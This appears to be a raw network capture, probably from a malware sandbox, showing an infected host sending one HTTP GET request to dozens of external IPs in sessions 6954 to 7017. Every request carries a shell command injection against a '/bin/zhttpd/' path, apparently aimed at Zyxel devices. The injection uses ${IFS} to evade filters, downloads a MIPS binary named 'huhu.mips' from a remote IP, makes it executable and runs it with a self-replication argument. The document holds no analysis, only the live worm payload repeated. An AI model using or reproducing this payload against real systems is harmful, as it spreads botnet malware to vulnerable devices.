                                                Jan 29, 2024 07:07:58.546916962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6954192.168.2.2357744189.6.127.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.546989918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6955192.168.2.235248878.79.178.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547003984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6956192.168.2.2342660192.225.50.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547025919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6957192.168.2.233385212.10.208.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547111034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6958192.168.2.2355446125.97.69.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547111034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6959192.168.2.2340392176.243.129.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547153950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6960192.168.2.235190280.251.61.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547194958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6961192.168.2.2358274189.98.20.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547257900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6962192.168.2.234308441.226.101.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547293901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6963192.168.2.234596865.178.21.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547293901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6964192.168.2.2347442166.30.116.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547322035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6965192.168.2.235341842.161.48.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547353029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6966192.168.2.2357406129.211.104.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547415018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6967192.168.2.2348858203.158.211.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547436953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6968192.168.2.2340166136.255.216.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547477961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6969192.168.2.2352046194.41.177.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547502041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6970192.168.2.234178449.4.30.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547538996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6971192.168.2.2357654166.180.125.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547590971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6972192.168.2.235060282.67.79.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547648907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6973192.168.2.236052690.44.236.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547668934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6974192.168.2.234986280.206.109.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547702074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6975192.168.2.234232842.189.97.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547759056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6976192.168.2.2348566132.212.172.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547794104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6977192.168.2.2347680201.27.72.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547822952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6978192.168.2.2356042131.169.163.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547873974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6979192.168.2.2350930205.173.164.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547915936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6980192.168.2.23377465.38.124.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547957897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6981192.168.2.2357220219.240.180.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.547998905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6982192.168.2.2357560157.49.148.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548049927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6983192.168.2.2345184140.21.14.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548098087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6984192.168.2.233838279.199.55.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548158884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6985192.168.2.2351774179.84.125.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548177004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6986192.168.2.2341466125.125.45.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548206091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6987192.168.2.2359886155.8.155.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548283100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6988192.168.2.2348768136.36.40.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548289061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6989192.168.2.233700090.239.147.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548432112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6990192.168.2.234770693.168.182.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548481941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6991192.168.2.2360024194.166.62.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548511982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6992192.168.2.2347114148.121.13.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548562050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6993192.168.2.233708462.181.30.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548619032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6994192.168.2.234388868.165.41.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548619032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6995192.168.2.234770062.48.140.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548666000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6996192.168.2.233648063.70.187.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548712015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6997192.168.2.233361069.254.80.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548752069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6998192.168.2.2346104190.208.211.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548787117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6999192.168.2.2338888125.146.30.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548819065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7000192.168.2.2338006135.58.131.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548839092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7001192.168.2.2336838114.204.160.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548916101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7002192.168.2.235608689.7.251.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548947096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7003192.168.2.2357994205.215.173.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.548970938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7004192.168.2.234096235.12.77.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549021006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7005192.168.2.23555169.221.23.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549065113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7006192.168.2.2360960136.39.219.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549093008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7007192.168.2.2347424137.189.62.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549129963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7008192.168.2.2335480142.71.171.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549171925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7009192.168.2.233782437.250.212.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549217939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7010192.168.2.235037868.222.113.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549262047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7011192.168.2.2334830106.54.7.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549278021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7012192.168.2.2340082116.205.125.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549315929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7013192.168.2.2356562140.119.106.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549379110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7014192.168.2.234526899.141.81.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549410105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7015192.168.2.2336782208.77.196.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549452066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7016192.168.2.2343992101.49.207.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549499989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7017192.168.2.2337678192.158.113.74443
                                                TimestampBytes transferredDirectionData
